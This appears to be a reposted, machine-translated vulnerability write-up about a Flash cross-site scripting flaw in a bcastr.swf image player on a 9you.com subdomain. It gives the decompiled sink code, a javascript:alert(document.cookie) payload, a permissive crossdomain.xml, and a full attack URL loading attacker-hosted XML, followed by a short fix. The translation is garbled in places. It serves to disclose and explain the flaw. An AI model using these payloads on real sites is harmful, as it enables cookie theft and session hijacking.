In-depth analysis and utilization of FLASH Security Issues of jiuyou Network (I)

Source: Internet
Author: User

GetURL security issues.

Case: lh.9you.com/web_v3/bcastr.swf? Bcastr_xml_url = xml/bcastr. xml refers to the call method. The external configuration or data file Suffix of the call, such as: xml and other Flash actionscript scripts. Currently, there are two versions on the network, namely, the content of functions 2.0 and 3.0 A is as follows: // as3.0 navigateToURL (new URLRequest (parameter), "_ self"); // as2.0 getURL (parameter, "_ self"); the case is 2.0. the parameter is the opened link. If the parameter is "javascript: alert (1)", you can execute javascript code. The effect of clicking to execute code here is similar to <a href = "javascript: alert (1) "> click I bring up 1 </a>. Let's take a look at the information in the xml configuration file: item_url is the displayed image Address link, and click the image jump parameter; this is the controllable parameter mentioned above. look at this swf in reverse order: getURL (bcastr_link_array [this. id], "_ blank"); find similar code. We can see from the variable name that bcastr_link_array is the array of link tags, and trace bcastr_link_array. bcastr_link_array = new Array ();............................. while (I <item_total_num) {bcastr_flie_array.push (bcastr_xml.firstChild.childNodes [I]. attributes. item_url); bcastr_title_array.push (bcastr_xml.firstChild.childNodes [I]. attributes. itemtitle); bcastr_link_array.push (bcastr_xml.firstChild.childNodes [I]. attributes. link); ++ I;} proves our conjecture that array loops are assigned values.

Vulnerability exploitation: converts link tag addresses to our attack code, such as javascript: alert (document. cookie); Cross-origin operation. place a crossdomain under the root directory of our website. xml <? Xml version = "1.0"?> <Cross-domain-policy> <allow-access-from domain = ""/> </cross-domain-policy> in this example, the website-> is changed: * .9you.com (match any 9you.com sub-domain name) last attack connection: http://lh.9you.com/web_v3/bcastr.swf? Bcastr_xml_url = http: // 127.0.0.1: 8080/bcastr. xml http: // 127.0.0.1: 8080/bcastr. xml is the environment I have set up. Click the image in it.

 Solution:

Perform regular identification on the link url passed in XML or restrict loading of XML files from third-party websites. If you have checked these swf files, I will not refresh them.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.